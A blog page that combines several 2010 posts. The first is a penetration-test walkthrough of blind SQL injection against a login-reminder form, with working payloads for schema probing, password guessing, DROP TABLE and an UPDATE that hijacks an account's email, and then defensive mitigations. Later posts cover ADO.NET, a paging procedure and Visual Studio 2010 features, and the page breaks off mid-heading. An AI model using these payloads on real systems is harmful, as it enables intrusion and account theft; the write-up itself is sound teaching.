Saturday, October 2, 2010

This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL Server. We believe that these techniques can apply to nearly any web application backed by any SQL server.

The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system.

When an email address was entered, the system presumably looked in the user database for that address and mailed something to it. Since my email address was not found, it wasn't going to send me anything.

So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL string literally without sanitizing. When submitting the form with a quote in the email address, we get a 500 error (server failure), and this suggests that the "broken" input is actually being parsed literally. Bingo.

We speculate that the underlying SQL code looks something like this:

SELECT fieldlist

FROM table

WHERE field = '$EMAIL';

Here, $EMAIL is the address submitted on the form by the user, and the larger query provides the quotation marks that set it off as a literal string. We don't know the specific names of the fields or table involved, but we do know their nature, and we'll make some good guesses later.

When we enter steve@unixwiz.net' - note the closing quote mark - this yields constructed SQL:

SELECT fieldlist

FROM table

WHERE field = 'steve@unixwiz.net'';

When this is executed, the SQL parser finds the extra quote mark and aborts with a syntax error. How this manifests itself to the user depends on the application's internal error-recovery procedures, but it's usually different from "email address is unknown". This error response is a dead giveaway that user input is not being sanitized properly and that the application is ripe for exploitation.

Since the data we're filling in appears to be in the WHERE clause, let's change the nature of that clause in a way that is still legal SQL and see what happens. By entering anything' OR 'x'='x, the resulting SQL is:

SELECT fieldlist

FROM table

WHERE field = 'anything' OR 'x'='x';

Because the application is not really thinking about the query - merely constructing a string - our use of quotes has turned a single-component WHERE clause into a two-component one, and the 'x'='x' clause is guaranteed to be true no matter what the first clause is (there is a better approach for this "always true" part that we'll touch on later).
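The effect of building the query by plain string concatenation can be reproduced in a few lines. This is a minimal sketch using Python's built-in sqlite3 module and a throwaway in-memory table; the table contents and the helper build_query are made up for illustration and are not the application's real code.

```python
import sqlite3

def build_query(email: str) -> str:
    # Hypothetical reconstruction of the vulnerable pattern: the form value
    # is pasted straight into the SQL text with no escaping or binding.
    return "SELECT email FROM members WHERE email = '" + email + "'"

# Throwaway in-memory database with two made-up members.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE members (email TEXT, passwd TEXT)")
conn.executemany(
    "INSERT INTO members VALUES (?, ?)",
    [("alice@example.com", "a"), ("bob@example.com", "b")],
)

normal_rows = conn.execute(build_query("alice@example.com")).fetchall()
widened_sql = build_query("anything' OR 'x'='x")
widened_rows = conn.execute(widened_sql).fetchall()

print(widened_sql)        # the WHERE clause now has two components
print(len(normal_rows))   # the single matching member
print(len(widened_rows))  # every row in the table
```

The point of the sketch is that the database never sees "an email address"; it only sees the finished SQL text, so whatever the quotes do to that text is what gets executed.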

But unlike the "real" query, which should return only a single item each time, this version will essentially return every item in the members database. The only way to find out what the application will do in this circumstance is to try it. Doing so, we were greeted with:

--------------------------------------------------------------------------------

Your login information has been mailed to random.person@example.com.

--------------------------------------------------------------------------------

Our best guess is that it's the first record returned by the query, effectively an entry taken at random. This person really did get this forgotten-password link via email, which will probably come as a surprise to him and may raise warning flags somewhere.

We now know that we're able to manipulate the query to our own ends, though we still don't know much about the parts of it we cannot see. But we have observed three different responses to our various inputs:

•"Your login information has been mailed to email"

•"We don't recognize your email address"

•Server error

The first two are responses to well-formed SQL, while the last is for bad SQL: this distinction will be very useful when trying to guess the structure of the query.

Schema field mapping

The first steps are to guess some field names: we're reasonably sure that the query includes "email address" and "password", and there may be things like "US Mail address" or "userid" or "phone number". We'd dearly love to perform a SHOW TABLE, but in addition to not knowing the name of the table, there is no obvious vehicle to get the output of this command routed to us.

So we'll do it in steps. In each case, we'll show the whole query as we know it, with our own snippets shown specially. We know that the tail end of the query is a comparison with the email address, so let's guess email as the name of the field:

SELECT fieldlist

FROM table

WHERE field = 'x' AND email IS NULL; --';

The intent is to use a proposed field name (email) in the constructed query and find out if the SQL is valid or not. We don't care about matching the email address (which is why we use a dummy 'x'), and the -- marks the start of an SQL comment. This is an effective way to "consume" the final quote provided by the application and not worry about matching it.

If we get a server error, it means our SQL is malformed and a syntax error was thrown: it's most likely due to a bad field name. If we get any kind of valid response, we guessed the name correctly. This is the case whether we get the "email unknown" or "password was sent" response.

Note, however, that we use the AND conjunction instead of OR: this is intentional. In the SQL schema mapping phase, we're not really concerned with guessing any particular email addresses, and we do not want random users inundated with "here is your password" emails from the application - this will surely raise suspicions to no good purpose. By using the AND conjunction with an email address that couldn't ever be valid, we're sure that the query will always return zero rows and never generate a password-reminder email.

Submitting the above snippet indeed gave us the "email address unknown" response, so now we know that the email address is stored in a field email. If this hadn't worked, we'd have tried email_address or mail or the like. This process will involve quite a lot of guessing.

Next we'll guess some other obvious names: password, user ID, name, and the like. These are all done one at a time, and anything other than "server failure" means we guessed the name correctly.

SELECT fieldlist

FROM table

WHERE email = 'x' AND userid IS NULL; --';

As a result of this process, we found several valid field names:

•email

•passwd

•login_id

•full_name

There are certainly more (and a good source of clues is the names of the fields on forms), but a bit of digging did not discover any. But we still don't know the name of the table that these fields are found in - how to find out?

Finding the table name

The application's built-in query already has the table name built into it, but we don't know what that name is: there are several approaches for finding that (and other) table names. The one we took was to rely on a subselect.

A standalone query of

SELECT COUNT(*) FROM tabname

returns the number of records in that table, and of course fails if the table name is unknown. We can build this into our string to probe for the table name:

SELECT email, passwd, login_id, full_name

FROM table

WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';

We don't care how many records are there, of course, only whether the table name is valid or not. By iterating over several guesses, we eventually determined that members was a valid table in the database. But is it the table used in this query? For that we need yet another test using table.field notation: this only works for tables that are actually part of the query, not for tables that merely exist in the database.

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'x' AND members.email IS NULL; --';

When this returned "Email unknown", it confirmed that our SQL was well formed and that we had properly guessed the table name. This will be important later, but we instead took a different approach in the interim.

Finding some users

At this point we have a partial idea of the structure of the members table, but we only know of one username: the random member who got our initial "Here is your password" email. Recall that we never received the message itself, only the address it was sent to. We'd like to get some more names to work with, preferably those likely to have access to more data.

The first place to start, of course, is the company's website to find who is who: the "About us" or "Contact" pages often list who's running the place. Many of these contain email addresses, but even those that don't list them can give us some clues which allow us to find them with our tool.

The idea is to submit a query that uses the LIKE clause, allowing us to do partial matches of names or email addresses in the database, each time triggering the "We sent your password" message and email. Warning: though this reveals an email address each time we run it, it also actually sends that email, which may raise suspicions. This suggests that we take it easy.

We can do the query on email name or full name (or presumably other information), each time putting in the % wildcards that LIKE supports:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'x' OR full_name LIKE '%Bob%';

Keep in mind that even though there may be more than one "Bob", we only get to see one of them: this suggests refining our LIKE clause narrowly.

Ultimately, we may only need one valid email address to leverage our way in.

Brute-force password guessing

One can certainly attempt brute-force guessing of passwords at the main login page, but many systems make an effort to detect or even prevent this. There could be logfiles, account lockouts, or other devices that would substantially impede our efforts, but because of the non-sanitized inputs, we have another avenue that is much less likely to be so protected.

We'll instead do actual password testing in our snippet by including the email name and password directly. In our example, we'll use our victim, bob@example.com and try multiple passwords.

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'bob@example.com' AND passwd = 'hello123';

This is clearly well-formed SQL, so we don't expect to see any server errors, and we'll know we found the password when we receive the "your password has been mailed to you" message. Our mark has now been tipped off, but we do have his password.

This procedure can be automated with scripting in Perl, and though we were in the process of creating this script, we ended up going down another road before actually trying it.

The database isn't readonly

So far, we have done nothing but query the database, and even though a SELECT is readonly, that doesn't mean that SQL is. SQL uses the semicolon for statement termination, and if the input is not sanitized properly, there may be nothing that prevents us from stringing our own unrelated command at the end of the query.

The most drastic example is:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'x'; DROP TABLE members; --'; -- Boom!

The first part provides a dummy email address -- 'x' -- and we don't care what this query returns: we're just getting it out of the way so we can introduce an unrelated SQL command. This one attempts to drop (delete) the entire members table, which really doesn't seem too sporting.

This shows that not only can we run separate SQL commands, but we can also modify the database. This is promising.

Adding a new member

Given that we know the partial structure of the members table, it seems like a plausible approach to attempt adding a new record to that table: if this works, we'll simply be able to login directly with our newly-inserted credentials.

This, not surprisingly, takes a bit more SQL, and we've wrapped it over several lines for ease of presentation, but our part is still one contiguous string:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'x';

INSERT INTO members ('email','passwd','login_id','full_name')

VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--';

Even if we have actually gotten our field and table names right, several things could get in our way of a successful attack:

1.We might not have enough room in the web form to enter this much text directly (though this can be worked around via scripting, it's much less convenient).

2.The web application user might not have INSERT permission on the members table.

3.There are undoubtedly other fields in the members table, and some may require initial values, causing the INSERT to fail.

4.Even if we manage to insert a new record, the application itself might not behave well due to the auto-inserted NULL fields that we didn't provide values for.

5.A valid "member" might require not only a record in the members table, but associated information in other tables (say, "accessrights"), so adding to one table alone might not be sufficient.

In the case at hand, we hit a roadblock on either #4 or #5 - we can't really be sure - because when going to the main login page and entering the above username and password, a server error was returned. This suggests that fields we did not populate were vital, but nevertheless not handled properly.

A possible approach here is attempting to guess the other fields, but this promises to be a long and laborious process: though we may be able to guess other "obvious" fields, it's very hard to imagine the bigger-picture organization of this application.

We ended up going down a different road.

Mail me a password

We then realized that though we are not able to add a new record to the members database, we can modify an existing one, and this proved to be the approach that gained us entry.

From a previous step, we knew that bob@example.com had an account on the system, and we used our SQL injection to update his database record with our email address:

SELECT email, passwd, login_id, full_name

FROM members

WHERE email = 'x';

UPDATE members

SET email = 'steve@unixwiz.net'

WHERE email = 'bob@example.com';

After running this, we of course received the "we didn't know your email address" message, but this was expected due to the dummy email address provided. The UPDATE wouldn't have registered with the application, so it executed quietly.

We then used the regular "I lost my password" link - with the updated email address - and a minute later received this email:

From: system@example.com

To: steve@unixwiz.net

Subject: Intranet login

This email is in response to your request for your Intranet log in information.

Your User ID is: bob

Your password is: hello

It was now just a matter of following the standard login process to access the system as a high-ranked MIS staffer, and this was far superior to a perhaps-limited user that we might have created with our INSERT approach.

We found the intranet site to be quite comprehensive, and it included - among other things - a list of all the users. It's a fair bet that many Intranet users also have accounts on the corporate Windows network, and perhaps some of them have used the same password in both places. Since it's clear that we have an easy way to retrieve any Intranet password, and since we had located an open PPTP VPN port on the corporate firewall, it should be straightforward to attempt this kind of access.

We had done a spot check on a few accounts without success, and we can't really know whether it's "bad password" or "the Intranet account name differs from the Windows account name". But we think that automated tools could make some of this easier.

Other Approaches

In this particular engagement, we obtained enough access that we did not feel the need to do much more, but other steps could have been taken. We'll touch on the ones that we can think of now, though we are quite certain that this is not comprehensive.

We are also aware that not all approaches work with all databases, and we can touch on some of them here.

Use xp_cmdshell

Microsoft's SQL Server supports a stored procedure xp_cmdshell that permits what amounts to arbitrary command execution, and if this is permitted to the web user, complete compromise of the webserver is inevitable.

What we had done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users.

Map out more database structure

Though this particular application provided such a rich post-login environment that it didn't really seem necessary to dig further, in other more limited environments this may not have been sufficient.

Being able to systematically map out the available schema, including tables and their field structure, can't help but provide more avenues for compromise of the application.

One could probably gather more hints about the structure from other aspects of the website (e.g., is there a "leave a comment" page? Are there "support forums"?). Clearly, this is highly dependent on the application and it relies very much on making good guesses.

Mitigations

We believe that web application developers often simply do not think about "surprise inputs", but security people do (including the bad guys), so there are several broad approaches that can be applied here.

Sanitize the input

It's absolutely vital to sanitize user inputs to ensure that they do not contain dangerous codes, whether to the SQL server or to HTML itself. One's first idea is to strip out "bad stuff", such as quotes or semicolons or escapes, but this is a misguided attempt. Though it's easy to point out some dangerous characters, it's harder to point to all of them.

The language of the web is full of special characters and strange markup (including alternate ways of representing the same characters), and efforts to authoritatively identify all "bad stuff" are unlikely to be successful.

Instead, rather than "remove known bad data", it's better to "remove everything but known good data": this distinction is crucial. Since - in our example - an email address can contain only these characters:

abcdefghijklmnopqrstuvwxyz

ABCDEFGHIJKLMNOPQRSTUVWXYZ

0123456789

@.-_+

there is really no benefit in allowing characters that could not be valid, and rejecting them early - presumably with an error message - not only helps forestall SQL Injection, but also catches mere typos early rather than storing them in the database.
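The "known good" check can be sketched as a single allowlist pattern. This is a minimal sketch in Python; the helper name is_acceptable_email and the 254-character length cap are illustrative assumptions, and the character set is exactly the narrow one listed above rather than the full RFC 2822 grammar.

```python
import re

# Allowlist built from the characters listed above: letters, digits, @ . - _ +
# (the hyphen is placed last in the class so it is taken literally).
ALLOWED_EMAIL = re.compile(r"[A-Za-z0-9@._+-]+")

def is_acceptable_email(value: str) -> bool:
    # fullmatch() requires every character to be on the allowlist;
    # the length cap is an illustrative assumption, not from the article.
    return 0 < len(value) <= 254 and ALLOWED_EMAIL.fullmatch(value) is not None

print(is_acceptable_email("steve@unixwiz.net"))    # accepted
print(is_acceptable_email("anything' OR 'x'='x"))  # rejected: quote, space, =
```

Rejecting on the first disallowed character keeps the rule easy to audit: the question is never "is this character dangerous?" but only "is it on the list?".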

Sidebar on email addresses

--------------------------------------------------------------------------------

It's important to note here that email addresses in particular are troublesome to validate programmatically, because everybody seems to have his own idea about what makes one "valid", and it's a shame to exclude a good email address because it contains a character you didn't think about.

The only real authority is RFC 2822 (which encompasses the more familiar RFC822), and it includes a fairly expansive definition of what's allowed. The truly pedantic may well wish to accept email addresses with ampersands and asterisks (among other things) as valid, but others - including this author - are satisfied with a reasonable subset that includes "most" email addresses.

Those taking a more restrictive approach ought to be fully aware of the consequences of excluding these addresses, especially considering that better techniques (prepare/execute, stored procedures) obviate the security concerns which those "odd" characters present.

--------------------------------------------------------------------------------

Be aware that "sanitizing the input" doesn't mean merely "remove the quotes", because even "regular" characters can be troublesome. In an example where an integer ID value is being compared against the user input (say, a numeric PIN):

SELECT fieldlist

FROM table

WHERE id = 23 OR 1=1; -- Boom! Always matches!

In practice, however, this approach is highly limited because there are so few fields for which it's possible to outright exclude many of the dangerous characters. For "dates" or "email addresses" or "integers" it may have merit, but for any kind of real application, one simply cannot avoid the other mitigations.
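For a numeric field such as the PIN above, the equivalent check is to insist that the input really is a number before it gets anywhere near the query text. A minimal sketch in Python; parse_pin is a hypothetical helper, not part of any library.

```python
def parse_pin(raw: str) -> int:
    # Accept only ASCII digits; anything else (spaces, "OR", "=") is rejected
    # before it can become part of an SQL statement.
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("PIN must consist of digits only")
    return int(raw)

print(parse_pin("23"))
try:
    parse_pin("23 OR 1=1")
except ValueError as exc:
    print("rejected:", exc)
```

Because the function returns an int rather than the original string, whatever is later placed in the query can only ever be a number.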

Escape/Quotesafe the input

Even if one might be able to sanitize a phone number or email address, one cannot take this approach with a "name" field lest one wishes to exclude the likes of Bill O'Reilly from one's application: a quote is simply a valid character for this field.

One includes an actual single quote in an SQL string by putting two of them together, so this suggests the obvious - but wrong! - technique of preprocessing every string to replicate the single quotes:

SELECT fieldlist

FROM customers

WHERE name = 'Bill O''Reilly'; -- works OK

However, this naïve approach can be beaten because most databases support other string escape mechanisms. MySQL, for instance, also permits \' to escape a quote, so after input of \'; DROP TABLE users; -- is "protected" by doubling the quotes, we get:

SELECT fieldlist

FROM customers

WHERE name = '\''; DROP TABLE users; --'; -- Boom!

The expression '\'' is a complete string (containing just one single quote), and the usual SQL shenanigans follow. It doesn't stop with backslashes either: there is Unicode, other encodings, and parsing oddities all hiding in the weeds to trip up the application designer.

Getting quotes right is notoriously difficult, which is why many database interface languages provide a function that does it for you. When the same internal code is used for "string quoting" and "string parsing", it's much more likely that the process will be done properly and safely.

Some examples are the MySQL function mysql_real_escape_string() and the Perl DBI method $dbh->quote($value).

These methods must be used.

Use bound parameters (the PREPARE statement)

Though quotesafing is a good mechanism, we're still in the area of "considering user input as SQL", and a much better approach exists: bound parameters, which are supported by essentially all database programming interfaces. In this technique, an SQL statement string is created with placeholders - a question mark for each parameter - and it's compiled ("prepared", in SQL parlance) into an internal form.

Later, this prepared query is "executed" with a list of parameters:

Example in perl

$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");

$sth->execute($email);

Thanks to Stefan Wagner, this demonstrates bound parameters in Java:

Insecure version

Statement s = connection.createStatement();

ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = "

+ formField); // *boom*

Secure version

PreparedStatement ps = connection.prepareStatement(

"SELECT email FROM member WHERE name = ?");

ps.setString(1, formField);

ResultSet rs = ps.executeQuery();

In the Perl example, $email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark); at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is largely immune to SQL injection attacks.

There also may be some performance benefits if this prepared query is reused multiple times (it only has to be parsed once), but this is minor compared to the enormous security benefits. This is probably the single most important step one can take to secure a web application.
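The same idea can be sketched in Python with the built-in sqlite3 module, which uses the same question-mark placeholder. The in-memory table and the helper find_member are made up for illustration; the point is only that the quote-laden input from earlier is treated as an ordinary (non-matching) string.

```python
import sqlite3

# Throwaway in-memory database with one made-up member.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE members (email TEXT, userid TEXT)")
conn.execute("INSERT INTO members VALUES (?, ?)", ("bob@example.com", "bob"))

def find_member(email: str):
    # The ? placeholder is bound by the driver: the value is passed as data
    # and is never parsed as part of the SQL statement.
    cur = conn.execute(
        "SELECT email, userid FROM members WHERE email = ?", (email,)
    )
    return cur.fetchall()

print(find_member("bob@example.com"))      # [('bob@example.com', 'bob')]
print(find_member("anything' OR 'x'='x"))  # []
```

Note that the SQL text is a constant here: nothing the user types can change the number of clauses in the WHERE.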

Limit database permissions and segregate users

In the case at hand, we observed just two interactions that are made not in the context of a logged-in user: "log in" and "send me password". The web application ought to use a database connection with the most limited rights possible: query-only access to the members table, and no access to any other table.

The effect here is that even a "successful" SQL injection attack is going to have much more limited success. Here, we'd not have been able to do the UPDATE request that ultimately granted us access, so we'd have had to resort to other avenues.

Once the web application determined that a set of valid credentials had been passed via the login form, it would then switch that session to a database connection with more rights.

It should go almost without saying that sa rights should never be used for any web-based application.

Use stored procedures for database access

When the database server supports them, use stored procedures for performing access on the application's behalf, which can eliminate SQL from the application code entirely (assuming the stored procedures themselves are written properly).

By encapsulating the rules for a certain action - query, update, delete, etc. - into a single procedure, it can be tested and documented on a standalone basis and business rules enforced (for instance, the "add new order" procedure might reject that order if the customer were over his credit limit).

For simple queries this might be only a minor benefit, but as the operations become more complicated (or are used in more than one place), having a single definition for the operation means it's going to be more robust and easier to maintain.

Note: it's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection - it's only proper binding with prepare/execute or direct SQL statements with bound variables that provides this protection.

Isolate the webserver

Even having taken all these mitigation steps, it's nevertheless still possible to miss something and leave the server open to compromise. One ought to design the network infrastructure to assume that the bad guy will have full administrator access to the machine, and then attempt to limit how that can be leveraged to compromise other things.

For instance, putting the machine in a DMZ with extremely limited pinholes "inside" the network means that even getting complete control of the webserver doesn't automatically grant full access to everything else. This won't stop everything, of course, but it makes it a lot harder.

Configure error reporting

The default error reporting for some frameworks includes developer debugging information, and this must not be shown to outside users. Imagine how much easier a time it makes for an attacker if the full query is shown, pointing to the syntax error involved.

This information is useful to developers, but it should be restricted - if possible - to just internal users.
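One way to keep the details internal is to log the failure on the server and return the same generic message for every database error. This is a minimal sketch in Python with sqlite3 and the standard logging module; the logger name, the message text, and the helper lookup_email are illustrative assumptions.

```python
import logging
import sqlite3

log = logging.getLogger("app.db")

GENERIC_ERROR = "Sorry, something went wrong. Please try again later."

def lookup_email(conn: sqlite3.Connection, email: str) -> str:
    try:
        row = conn.execute(
            "SELECT email FROM members WHERE email = ?", (email,)
        ).fetchone()
    except sqlite3.Error:
        # Full details (exception text, traceback) go to the server log only;
        # the visitor sees nothing about the query or the schema.
        log.exception("member lookup failed")
        return GENERIC_ERROR
    return "found" if row else "unknown"
```

The outside user learns only that something failed, while developers can still find the query and the traceback in the log.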

Note that not all databases are configured the same way, and not all even support the same dialect of SQL (the "S" stands for "Structured", not "Standard"). For instance, versions of MySQL before 4.1 do not support subselects, nor does MySQL usually allow multiple statements in a single query: these are substantially complicating factors when attempting to penetrate a network.

1. A DataReader is a forward-only, read-only cursor. Data read through a DataReader can be shown on a web form or control, but you cannot page through those records, because the cursor only moves forward. A DataReader is the best fit for displaying data that does not need to be worked on. A DataAdapter not only connects to the database (through a Command object) but also provides four commands (SelectCommand, InsertCommand, UpdateCommand, DeleteCommand). It supports the disconnected architecture of .NET, so we can populate a DataSet with the records. A DataAdapter is the best fit when the data has to be worked on.

2. A DataReader is connection-oriented: it moves in the forward direction only and holds a single row at a time. A DataAdapter acts as a bridge between the data source and the DataSet, and it is a multipurpose object, i.e. we can insert, update, and delete through a DataAdapter.

3. The DataSet consists of a collection of DataTable objects that you can relate to each other with DataRelation objects. A DataSet can read and write data and schema as XML documents. The DataReader object is the ADO.NET counterpart of the read-only, forward-only default ADO cursor.

4. A DataReader takes the data sequentially from the Command object and requires the connection to stay open while it is getting data. A DataAdapter fetches all the required data from the database and passes it to the DataSet. The DataSet holds that data in the form of DataTable objects.

5. DataSet: it is a disconnected architecture. This means that once the data has been read into the DataSet from a SqlDataAdapter, we can close the connection to the database and retrieve the data from the DataSet wherever we want. The DataSet holds the data in the form of tables and does not interact with the data source.

DataReader: it is a connected architecture. This means that the connection to the database must stay open while the SqlDataReader reads data from the database and while data is read from the SqlDataReader into any variable. Also, once you read some data from a SqlDataReader you should save it, because it is not possible to go back and read it again.

Sunday, September 19, 2010

This article uses the following technologies: ASP.NET, .NET Framework, IIS

CREATE PROCEDURE northwind_OrdersPaged
(
    @PageIndex int,
    @PageSize int
)
AS
BEGIN
    DECLARE @PageLowerBound int
    DECLARE @PageUpperBound int
    DECLARE @RowsToReturn int

    -- First set the rowcount
    SET @RowsToReturn = @PageSize * (@PageIndex + 1)
    SET ROWCOUNT @RowsToReturn

    -- Set the page bounds
    SET @PageLowerBound = @PageSize * @PageIndex
    SET @PageUpperBound = @PageLowerBound + @PageSize + 1

    -- Create a temp table to store the select results
    CREATE TABLE #PageIndex
    (
        IndexId int IDENTITY (1, 1) NOT NULL,
        OrderID int
    )

    -- Insert into the temp table
    INSERT INTO #PageIndex (OrderID)
    SELECT OrderID
    FROM Orders
    ORDER BY OrderID DESC

    -- Return total count
    SELECT COUNT(OrderID) FROM Orders

    -- Return paged results
    SELECT O.*
    FROM Orders O, #PageIndex PageIndex
    WHERE O.OrderID = PageIndex.OrderID
      AND PageIndex.IndexID > @PageLowerBound
      AND PageIndex.IndexID < @PageUpperBound
    ORDER BY PageIndex.IndexID
END
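The page-bound arithmetic in this procedure is easy to get wrong by one, so a small worked example may help. The sketch below mirrors the three SET statements in Python; the function names page_bounds and ids_on_page are made up for illustration, and the page index is zero-based as in the procedure.

```python
def page_bounds(page_index: int, page_size: int) -> tuple[int, int, int]:
    # Mirrors the SET statements in the stored procedure.
    rows_to_return = page_size * (page_index + 1)  # value given to SET ROWCOUNT
    lower = page_size * page_index                 # @PageLowerBound (exclusive)
    upper = lower + page_size + 1                  # @PageUpperBound (exclusive)
    return rows_to_return, lower, upper

def ids_on_page(page_index: int, page_size: int) -> list[int]:
    # IndexID values selected by "IndexID > lower AND IndexID < upper".
    _, lower, upper = page_bounds(page_index, page_size)
    return list(range(lower + 1, upper))

print(page_bounds(2, 10))  # (30, 20, 31)
print(ids_on_page(2, 10))  # IndexID 21 through 30
```

Both bounds are exclusive, which is why the upper bound carries the extra + 1: the third page of ten rows covers IndexID 21 to 30.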

// read the first resultset
reader = command.ExecuteReader();

// read the data from that resultset
while (reader.Read()) {
    suppliers.Add(PopulateSupplierFromIDataReader( reader ));
}

// read the next resultset
reader.NextResult();

// read the data from that second resultset
while (reader.Read()) {
    products.Add(PopulateProductFromIDataReader( reader ));
}

Monday, September 13, 2010

A Brief Discussion On Visual Studio 2010 Top Features

Monday, September 13, 2010 by Vips Zadafiya

Introduction

You guys all know that Microsoft Visual Studio 2010 will be launched on 12-April-2010 worldwide and is currently in the Release Candidate (RC) state. I have been exploring it since Beta 2 and have found it more useful than the earlier versions. Many features have been added to Visual Studio 2010 that will improve productivity in application development. Developers can use it for faster coding, collaboration across the whole team, and more. In this post I will describe the new features of Visual Studio 2010 that I have already explored. I think this will be beneficial for all.

Following are the new features in Visual Studio 2010.

Multi-targeting Application Development:

Using Visual Studio 2010 you can not only develop applications for .NET 4.0 but also target earlier versions of the framework. While creating a new project in the IDE you will see the option to select between different versions of the .NET Framework (i.e. 2.0, 3.0, 3.5 & 4.0).

Depending upon your choice it will filter the project templates in the New Project dialog. If you select “.NET Framework 4.0” it will show all the project types, but if you select “.NET Framework 2.0” it will only show the projects supported by .NET Framework 2.0.

Not only this, as Visual Studio 2010 builds on top of Windows Presentation Foundation (WPF), you will find it more useful while searching for a specific project type. Suppose, you want to develop an application for your client in WPF & you are finding it very difficult to search within a huge collection of project types. Don’t worry. There is a “Search Box” right to the dialog for you to help finding the same. Just enter the keyword (in this case “WPF”) & see the magic. While typing, it will auto filter based on the keyword you entered.

Faster Intellisense Support:

Visual Studio now comes with faster IntelliSense support. It is now 2-5 times faster than in the earlier versions, and the IDE filters the IntelliSense list as you type. Suppose you want to create an instance of “WeakReference”. Thanks to the search algorithm of the VS2010 IDE, you don’t have to type the full class name. Just type “WR” and the list is filtered automatically to show you “WeakReference”. Try it out.
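The IDE's actual matching algorithm is not described here, so the following Java sketch is only an assumption about how abbreviation filtering of this kind could work: a candidate matches if it starts with the typed text or if its capital-letter initials do. The class name `CamelCaseFilter` and its methods are hypothetical.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;

// Hypothetical sketch of abbreviation filtering; not Visual Studio's real algorithm.
final class CamelCaseFilter {

    // Collects the upper-case letters of a name, e.g. "WeakReference" -> "WR".
    static String initials(String name) {
        StringBuilder sb = new StringBuilder();
        for (char c : name.toCharArray()) {
            if (Character.isUpperCase(c)) {
                sb.append(c);
            }
        }
        return sb.toString();
    }

    // A candidate matches when it starts with the typed text (ignoring case)
    // or when its initials start with the typed text.
    static boolean matches(String typed, String candidate) {
        if (typed.isEmpty()) {
            return true;
        }
        String t = typed.toUpperCase(Locale.ROOT);
        return candidate.toUpperCase(Locale.ROOT).startsWith(t)
                || initials(candidate).startsWith(t);
    }

    // Keeps only the candidates that match the typed text, in their original order.
    static List<String> filter(String typed, List<String> candidates) {
        List<String> result = new ArrayList<>();
        for (String candidate : candidates) {
            if (matches(typed, candidate)) {
                result.add(candidate);
            }
        }
        return result;
    }

    public static void main(String[] args) {
        List<String> names = Arrays.asList("WeakReference", "WebRequest", "Window", "StringWriter");
        System.out.println(filter("WR", names));
    }
}
```

In this sketch, typing “WR” keeps “WeakReference” and “WebRequest” and drops “Window” and “StringWriter”, because only the first two have initials beginning with W and R.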

Editor Zoom Functionality:

You will find this feature useful when you are giving a presentation or doing a webcast. Before VS2010 you had to open the options panel and change the font size of the editor there, which was a little troublesome. Now that issue is gone, and you don’t have to remember where to go to change the text size. While inside the editor window, just hold down the control key (CTRL) and use your mouse wheel to increase or decrease the zoom level.



Faster Assembly loading in “Add Reference”:

In Visual Studio 2010 the “Add Reference” dialog loads assemblies much faster. In earlier versions the dialog froze for some time while it loaded all the assemblies. The 2010 IDE focuses on the “Project” tab by default and loads the other tabs in the background. If the dialog does open on the “.Net” tab, you will notice that it loads the assemblies on a background thread instead of all at once, which improves the loading time.

Detach Window outside IDE:

Are you working on dual monitors? If so, you will find this feature very useful. The VS2010 IDE now supports detaching windows from the IDE. Suppose you want to move your “Error”, “Output”, “Solution Explorer” or “Properties” window to the second monitor while working in the editor on the first monitor. You can do that now. This gives you more space in the editor and keeps your important windows visible outside the IDE.

Reference Highlight:

Another feature of the Visual Studio 2010 IDE is reference highlighting. For a given method or member variable, the IDE highlights every reference to it, which makes it easy to find each place where it is used.

Faster Code Generation:



Before discussing this feature, let me ask you a question: “Are you using TDD, i.e. Test Driven Development?” If so, you will find this feature not only useful but very attractive. So, what is it? Wait, ask yourself another question: “How do you write code while doing Test Driven Development?” Thinking? Right, you have to implement the skeleton of the class and its methods first, and then write the unit test cases before implementing the actual logic. VS2010 comes with an excellent feature that generates this code for you. Have a look at the following snapshot:

As you can see, I don’t have a class named “Person” in my project, and hence the IDE marks it as UNKNOWN by highlighting it in red. If you look closely at the first snapshot, you will see that although the class is not present in my namespace or even in the project, the IDE still offers the class name in IntelliSense. Great, right? Wait a minute. If you now place your cursor on “Person” and press F10 while holding down ALT+Shift, a dropdown appears with two menu items, asking you either to generate the class or to generate a new type.

The first option is the easy one. If you choose it, the IDE generates a class file named “Person” in the project. Let’s go for the second choice, which gives you more options and is much more interesting. It opens a new dialog, “Generate New Type”. There you can choose the access modifier you need (private/public/protected/internal), choose the kind of type to generate (enum/class/struct/interface), and change the location of the class file. You can put it in the same project or choose a different project in the solution. Not only that, you can also create a new file for the class or append the class to an existing file. In short, this feature gives you plenty of options to customize.

The same applies when generating methods. Have a look at that.

Box Selection:

This is another nice feature of Visual Studio 2010. Let’s describe it using an example. Suppose you declared some properties as public and later want to mark them as internal. How would you do this? You would replace the access modifiers with internal one by one. Am I right? In Visual Studio 2010 you can do this very easily. Hold down Alt+Shift and draw a box selection with your cursor, as in the first snapshot. Then type the desired characters to replace the text within the selected boundary.

In the example, the public keywords of the properties have been marked using the box selector, and typing changes all of the lines at once. Have a look at the second snapshot, where I am typing “internal” to replace “public” and the text appears on every line I marked.

Easy Navigation:

